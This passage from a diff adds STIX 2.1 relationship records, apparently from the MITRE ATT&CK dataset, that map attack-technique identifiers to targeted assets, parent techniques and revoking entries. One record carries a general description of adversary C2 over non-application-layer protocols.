"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-07T21:50:12.131Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f0ab826-93dc-47fe-a152-52ac3f190d7e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f163bcc-193b-49f4-884d-4246dff23e6c", + "created": "2020-02-18T16:48:56.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f194d73-0b7d-4d82-8b05-d2644e8dcc8a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f19e1e3-e4ba-40ac-b465-3134f5123b67", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f1c0831-4559-42ee-8364-66e6cdff3115", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f284fba-932d-4857-a48a-9606173896e4", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f2926a2-596f-459e-827e-6fe2d4646efd", + "created": "2023-09-29T18:06:46.756Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:46.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f3c9e24-0ee8-4d5f-a7b7-59fdf37939ab", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f5a43a0-14f5-4c70-8909-14a0c84644c8", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f71fb63-e52f-4d1a-8640-29760e9f566c", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9f797eac-b22f-4cae-bd28-bed8c6882051", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9fa5fa6a-3faa-4675-98bf-279b34a9483c", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9fa6797f-f2cb-4b93-b8eb-f40936e967f3", + "created": "2023-09-28T21:12:14.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:12:14.470Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9fb75f9e-018b-4287-9200-5e7fdf449b0b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9feede0a-38c3-4aa7-8416-c2b0d0d67f83", + "created": "2020-10-02T16:54:23.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9ffbf620-8e1f-4542-a271-9a3692db9a47", + "created": "2023-09-28T20:04:19.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:04:19.147Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a0027df6-a891-4ab4-a144-dc23e1aed4f5", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a00ca8c8-4126-4eed-852c-bf0620d723bc", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a00fdd61-2a57-49cc-abe3-e582069a61bb", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a03f53c2-4445-4ca5-ab2a-624afcbb9ea4", + "created": "2020-06-16T18:44:16.269Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", + "target_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a05fae96-7803-41ba-8845-9c0e853f3bff", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a08ce2fb-e649-47ea-b6a0-b062018c1c1d", + "created": "2024-06-27T09:34:22.714Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:34:22.714Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a09b4e6f-f0fd-487b-a755-db3f92d2cf77", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a0a53cec-42f4-45b0-bb0e-5701e2cd57eb", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a0b0df27-0cbf-48ee-b799-03a765bac71b", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a0b44623-ca9d-4498-9165-6f96e26ca271", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a0d943c2-1ecb-4050-becd-4da12665ed26", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a10133d4-069f-4678-bcfb-72aeaa575296", + "created": "2020-02-05T16:27:37.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1092450-2594-4814-9efe-a3a6fa865133", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a11d663e-e073-49d6-b238-4de1d295634e", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1280adb-dec6-4cad-bcec-b08be760484b", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1287275-bcfd-4551-a0bb-e5a8edafe222", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a15d718f-af30-4745-a837-887ba8f48727", + "created": "2023-09-29T16:30:46.705Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:30:46.705Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a16227c2-7a50-4207-adbf-1836fbec9061", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a18306b6-e012-403d-acc9-3cb3ae3b2e67", + "created": "2024-05-23T04:07:41.945Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:00:00.895Z", + "description": "Asset Mapping Rationale: Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a18acf4a-f19f-49ec-a668-0540da181878", + "created": "2024-06-26T19:22:10.617Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:22:10.617Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1a282e2-550b-4bc3-9621-25862590cf47", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a1a39cf1-dd69-4110-beac-77bf7acd0c62", + "created": "2020-03-13T20:26:46.789Z", + "created_by_ref": 